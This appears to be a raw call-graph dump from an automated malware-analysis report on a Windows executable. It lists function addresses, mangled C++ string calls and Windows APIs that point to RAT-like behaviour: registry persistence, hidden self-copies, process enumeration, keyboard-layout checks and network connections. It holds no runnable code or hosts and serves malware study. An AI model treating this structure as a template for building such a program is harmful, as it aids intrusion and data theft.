?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 3952->3956 4192 408e4e RegOpenKeyExA 3954->4192 3957 407655 3955->3957 3955->3963 3958 401289 6 API calls 3956->3958 4184 402b5b ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3957->4184 3961 4076c4 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3958->3961 3964 401289 6 API calls 3961->3964 3963->3945 3965 4076e0 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3964->3965 3967 401289 6 API calls 3965->3967 3968 4076fc ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3967->3968 3969 401289 6 API calls 3968->3969 3970 407718 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3969->3970 3971 401289 6 API calls 3970->3971 3972 407734 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3971->3972 3973 401289 6 API calls 3972->3973 3974 407750 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3973->3974 3975 4077c3 3974->3975 3976 40775d 3974->3976 3978 407950 3975->3978 3980 401289 6 API calls 3975->3980 3977 401289 6 API calls 3976->3977 3979 407766 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3977->3979 3981 401289 6 API calls 3978->3981 3979->3975 3982 40777c 3979->3982 3983 4077d5 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3980->3983 3984 407967 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 3981->3984 3986 401289 6 API calls 3982->3986 3987 4077e2 3983->3987 3988 407859 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 3983->3988 3985 407986 3984->3985 3989 4079a1 3985->3989 4303 40faed AllocConsole GetConsoleWindow 3985->4303 3990 407785 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3986->3990 3992 401289 6 API calls 3987->3992 3991 40786b ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3988->3991 3995 401289 6 API calls 3989->3995 3994 401289 6 API calls 3990->3994 3996 408e4e 3 API calls 3991->3996 3997 4077eb ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3992->3997 4000 407797 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3994->4000 4001 4079aa ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 3995->4001 4002 407886 3996->4002 3998 401289 6 API calls 3997->3998 4003 407803 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3998->4003 3999 407994 CreateThread 3999->3989 4959 40f8bf GetModuleFileNameA 3999->4959 4207 40712f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4000->4207 4005 401289 6 API calls 4001->4005 4006 407891 7 API calls 4002->4006 4007 407916 4002->4007 4008 401289 6 API calls 4003->4008 4011 4079d4 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4005->4011 4251 4090d0 4006->4251 4009 401289 6 API calls 4007->4009 4014 40781b ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4008->4014 4015 407929 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4009->4015 4010 4077ab ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4010->3975 4016 4079e1 4011->4016 4017 407a25 4011->4017 4013 40790e 4257 40fc2c free 4013->4257 4020 401289 6 API calls 4014->4020 4015->3978 4021 407936 4015->4021 4022 401289 6 API calls 4016->4022 4019 401289 6 API calls 4017->4019 4023 407a2e ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4019->4023 4024 40782d ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4020->4024 4025 401289 6 API calls 4021->4025 4026 4079ea ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4022->4026 4027 401289 6 API calls 4023->4027 4028 401289 6 API calls 4024->4028 4029 40793f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4025->4029 4030 401289 6 API calls 4026->4030 4031 407a40 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4027->4031 4032 40783f ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4028->4032 4258 407e0b GetModuleFileNameA ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4029->4258 4034 4079fc ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4030->4034 4036 40712f 37 API calls 4031->4036 4221 40650d 4032->4221 4035 40712f 37 API calls 4034->4035 4038 407a10 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4035->4038 4039 407a54 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateDirectoryA 4036->4039 4041 407ac2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4038->4041 4042 401289 6 API calls 4039->4042 4044 407af2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4041->4044 4045 407ad4 4041->4045 4043 407a88 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4042->4043 4043->4041 4309 403774 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4044->4309 4047 407ad7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4045->4047 4048 407af0 4045->4048 4306 4037d4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4047->4306 4049 401289 6 API calls 4048->4049 4051 407b14 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4049->4051 4052 407b21 CreateThread 4051->4052 4053 407b2d 4051->4053 4052->4053 4925 40e157 _EH_prolog 4052->4925 4054 401289 6 API calls 4053->4054 4055 407b36 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4054->4055 4056 407b50 4055->4056 4057 407b43 CreateThread 4055->4057 4058 401289 6 API calls 4056->4058 4057->4056 4955 40e157 194 API calls 4057->4955 4059 407b59 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4058->4059 4060 407b66 4059->4060 4061 407bb9 4059->4061 4063 401289 6 API calls 4060->4063 4062 401289 6 API calls 4061->4062 4064 407bc2 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4062->4064 4065 407b6f ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4063->4065 4067 407c06 4064->4067 4068 407bcf 4064->4068 4066 401289 6 API calls 4065->4066 4069 407b81 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4066->4069 4323 40e549 4067->4323 4070 401289 6 API calls 4068->4070 4073 40712f 37 API calls 4069->4073 4074 407bd8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 4070->4074 4072 407c11 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 4075 407c30 4072->4075 4076 407b95 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE CreateThread 4073->4076 4077 401289 6 API calls 4074->4077 4325 409e73 4075->4325 4076->4061 4956 401883 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateDirectoryA 4076->4956 4079 407bf2 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4077->4079 4314 405f6c 4079->4314 4378 408150 FindResourceA LoadResource LockResource SizeofResource 4082->4378 4084 407c6c malloc ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE malloc 4085 407cfb 4084->4085 4379 402a2a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4085->4379 4087 407d10 free ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4087->3913 4384 403507 4088->4384 4090 40efd6 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4091 40efe9 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I 4090->4091 4101 40f04e 4090->4101 4093 40f050 ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4091->4093 4094 40f002 ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4091->4094 4097 40f637 6 API calls 4093->4097 4385 40f637 4094->4385 4097->4101 4098 401b3c 2 API calls 4100 40f093 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4098->4100 4100->3915 4389 40f5ef 4101->4389 4103 408523 4102->4103 4121 40855d 4102->4121 4104 408537 4103->4104 4105 408572 4103->4105 4473 40868c 4104->4473 4106 4085c4 4105->4106 4114 408586 4105->4114 4109 401b6b 2 API calls 4106->4109 4111 4085d1 4109->4111 4110 401b6b 2 API calls 4110->4121 4112 403626 free 4111->4112 4113 4085e5 4112->4113 4115 401bb5 ??2@YAPAXI 4113->4115 4116 40868c ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4114->4116 4118 4085f6 4115->4118 4117 4085ac 4116->4117 4119 40863b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4117->4119 4120 40863b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4118->4120 4119->4121 4120->4121 4121->3917 4123 401b6b 2 API calls 4122->4123 4124 401b4a 4123->4124 4125 403626 free 4124->4125 4126 401b5e 4125->4126 4127 401289 4126->4127 4128 401295 4127->4128 4129 4012a3 4128->4129 4477 4012c8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@ _CxxThrowException 4128->4477 4129->3921 4132 408ec0 RegQueryValueExA RegCloseKey 4131->4132 4133 408eed 4131->4133 4132->3925 4133->3925 4135 409151 RegDeleteValueA 4134->4135 4136 40914d 4134->4136 4135->3930 4136->3930 4138 407d65 GetModuleHandleA GetProcAddress 4137->4138 4139 407d79 LoadLibraryA GetProcAddress 4137->4139 4138->4139 4140 407d96 GetModuleHandleA GetProcAddress 4139->4140 4141 407daa 10 API calls 4139->4141 4140->4141 4141->3936 4143 401289 6 API calls 4142->4143 4144 401011 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4143->4144 4145 40102f 4144->4145 4146 401020 4144->4146 4148 401289 6 API calls 4145->4148 4489 4010f1 GetModuleHandleA 4146->4489 4150 401039 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4148->4150 4149 401025 4149->4145 4490 401234 4149->4490 4151 401054 4150->4151 4155 401045 4150->4155 4152 401289 6 API calls 4151->4152 4154 40105e ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4152->4154 4156 40106a 4154->4156 4168 401079 4154->4168 4155->4151 4157 401234 88 API calls 4155->4157 4501 401178 RegOpenKeyExA 4156->4501 4157->4151 4159 401289 6 API calls 4161 401083 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4159->4161 4160 40106f 4165 401234 88 API calls 4160->4165 4160->4168 4162 40108f 4161->4162 4173 40109e 4161->4173 4502 4011a3 GetPEB 4162->4502 4164 401289 6 API calls 4167 4010a8 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4164->4167 4165->4168 4169 4010c6 4167->4169 4170 4010b6 CreateThread 4167->4170 4168->4159 4172 401289 6 API calls 4169->4172 4170->4169 4575 4011f8 4170->4575 4171 401234 88 API calls 4171->4173 4174 4010cf ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4172->4174 4173->4164 4175 4010eb GetModuleFileNameA 4174->4175 4176 4010db CreateThread 4174->4176 4177 408ef1 RegOpenKeyExA 4175->4177 4176->4175 4570 401216 4176->4570 4178 408f1c RegQueryValueExA RegCloseKey 4177->4178 4179 408f4d 4177->4179 4180 408f56 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4178->4180 4179->4180 4180->3940 4182 40f0c2 GetCurrentProcess 4181->4182 4183 4075ea ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 4181->4183 4182->4183 4183->3944 4185 408f64 3 API calls 4184->4185 4186 402bbd 4185->4186 4187 402bc4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4186->4187 4188 402c02 4186->4188 4189 408fda 7 API calls 4187->4189 4188->3963 4190 402bec ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4189->4190 4191 409132 2 API calls 4190->4191 4191->4188 4193 407677 4192->4193 4194 408e6e RegQueryValueExA RegCloseKey 4192->4194 4193->3963 4195 402a78 4193->4195 4194->4193 4196 408ef1 4 API calls 4195->4196 4197 402a99 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4196->4197 4198 4090d0 13 API calls 4197->4198 4199 402ae4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4198->4199 4200 408fda 7 API calls 4199->4200 4201 402b09 4200->4201 4202 40712f 37 API calls 4201->4202 4203 402b19 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ShellExecuteA 4202->4203 4204 402b43 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4203->4204 4205 402b3c exit 4203->4205 4204->3963 4205->4204 4206->3951 4208 407282 12 API calls 4207->4208 4209 407155 4207->4209 4208->4010 4210 407166 4209->4210 4211 407199 4209->4211 4212 40715c getenv ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 4209->4212 4582 40e4e6 GetModuleFileNameA ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4210->4582 4215 40f0b5 GetCurrentProcess 4211->4215 4212->4208 4217 40719e 4215->4217 4216 407172 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4218 4071fb ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4216->4218 4219 4071a2 7 API calls 4217->4219 4220 407203 7 API calls 4217->4220 4218->4208 4219->4218 4220->4218 4222 406528 6 API calls 4221->4222 4223 40657d 4221->4223 4224 4065a0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4222->4224 4225 40712f 37 API calls 4223->4225 4227 4065b5 4224->4227 4226 40658c ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4225->4226 4226->4224 4228 4065e0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4227->4228 4229 406619 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CopyFileA 4227->4229 4583 406339 4228->4583 4231 4066e3 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4229->4231 4233 406633 4229->4233 4234 406339 30 API calls 4231->4234 4232 40660f 4232->3991 4233->4231 4236 40669d 4233->4236 4237 40664d 4233->4237 4235 406712 4234->4235 4238 40671b ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ SetFileAttributesA 4235->4238 4239 40674d 9 API calls 4235->4239 4241 40712f 37 API calls 4236->4241 4240 40712f 37 API calls 4237->4240 4238->4239 4242 40673d ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ SetFileAttributesA 4238->4242 4243 406878 18 API calls 4239->4243 4244 4067d9 13 API calls 4239->4244 4245 406660 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4240->4245 4246 4066a8 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4241->4246 4242->4239 4247 406967 exit 4243->4247 4248 40696e ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4243->4248 4244->4243 4249 4066b7 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CopyFileA 4245->4249 4246->4249 4247->4248 4248->4232 4249->4231 4250 4066d3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 4249->4250 4250->4232 4252 4090eb 4251->4252 4253 402a2a 4 API calls 4252->4253 4254 409100 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4253->4254 4255 408fda 7 API calls 4254->4255 4256 40911f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4255->4256 4256->4013 4257->4007 4259 407e4c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ CreateToolhelp32Snapshot Process32First Process32Next 4258->4259 4260 407fae 4258->4260 4261 407e92 4259->4261 4610 40e5ce 4260->4610 4263 407e9a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4261->4263 4264 407f8f CloseHandle ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4261->4264 4269 407ed7 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 4261->4269 4263->4261 4267 408034 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4264->4267 4268 407fa5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4264->4268 4265 407fb7 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4266 40f0b5 GetCurrentProcess 4265->4266 4270 407fd0 4266->4270 4271 40803d ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4267->4271 4268->4260 4272 407f06 4269->4272 4273 407eec ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE Process32Next 4269->4273 4274 407fd4 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 4270->4274 4275 40800a ??8std@@YA_NPBDABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ 4270->4275 4276 408134 ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4271->4276 4277 408068 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2 4271->4277 4604 40f114 OpenProcess 4272->4604 4273->4261 4274->4275 4279 407ff0 ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD 4274->4279 4275->4271 4280 408021 4275->4280 4281 408140 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4276->4281 4615 405288 4277->4615 4279->4275 4280->4281 4284 40814b 4281->4284 4283 407f15 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4286 407f54 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4283->4286 4287 407f3d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4283->4287 4284->3978 4285 40808a ??2@YAPAXI ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@ 4616 405288 4285->4616 4290 407f65 4286->4290 4291 408026 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4286->4291 4287->4281 4289 4080ab ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@ CreateMutexA ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4617 40d477 _EH_prolog GetModuleHandleA GetProcAddress 4289->4617 4607 40f0df 4290->4607 4291->4268 4296 4080eb ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4629 409046 RegCreateKeyA 4296->4629 4297 40810f CloseHandle 4300 408108 4297->4300 4298 407f79 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4298->4264 4632 40fc2c free 4300->4632 4302 40811a ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4302->4284 4304 40fb11 ShowWindow 4303->4304 4305 40fb19 freopen printf 4303->4305 4304->4305 4305->3999 4307 4037fe ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4306->4307 4308 4037ee CreateThread 4306->4308 4307->4048 4308->4307 4637 40381b 4308->4637 4677 40374a GetKeyboardLayout 4309->4677 4312 4037b8 CreateThread ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4312->4048 4682 40383b 4312->4682 4313 4037ac CreateThread 4313->4312 4685 40380c 4313->4685 4315 405fcb 4314->4315 4316 405f8d ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4314->4316 4317 405fdb CreateThread 4315->4317 4319 405fd5 4315->4319 4318 408e4e 3 API calls 4316->4318 4317->4319 4771 405e72 Sleep 4317->4771 4320 405fb0 4318->4320 4319->4067 4320->4315 4321 405fb7 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4320->4321 4322 408e97 3 API calls 4321->4322 4322->4315 4324 40e569 6 API calls 4323->4324 4324->4072 4326 401289 6 API calls 4325->4326 4327 409e8d ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 4326->4327 4328 409ea1 Sleep 4327->4328 4329 409eae 4327->4329 4328->4329 4330 409eb7 7 API calls 4329->4330 4331 409f1d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4329->4331 4330->4331 4332 401289 6 API calls 4331->4332 4333 409f3a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4332->4333 4334 40efb5 20 API calls 4333->4334 4350 409f52 4334->4350 4337 401289 6 API calls 4338 409f8a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4337->4338 4339 40efb5 20 API calls 4338->4339 4340 409f9f 4339->4340 4341 401289 6 API calls 4340->4341 4342 409fb5 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ gethostbyname 4341->4342 4342->4350 4343 401289 6 API calls 4344 409ff1 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi htons 4343->4344 4344->4350 4345 401289 6 API calls 4348 40a6f4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi Sleep 4345->4348 4346 401b3c 2 API calls 4346->4350 4347 40a050 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 4347->4350 4348->4350 4349 401289 6 API calls 4351 40a024 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4349->4351 4350->4343 4350->4345 4350->4346 4350->4347 4350->4349 4353 401289 6 API calls 4350->4353 4862 402109 4350->4862 4867 402168 connect 4350->4867 4351->4350 4354 40a093 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4353->4354 4355 40a0a0 7 API calls 4354->4355 4356 40a112 4354->4356 4355->4356 4357 40a125 sprintf ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ _itoa 4356->4357 4358 401289 6 API calls 4357->4358 4359 40a16c GetTickCount 4358->4359 4870 40ed35 _itoa 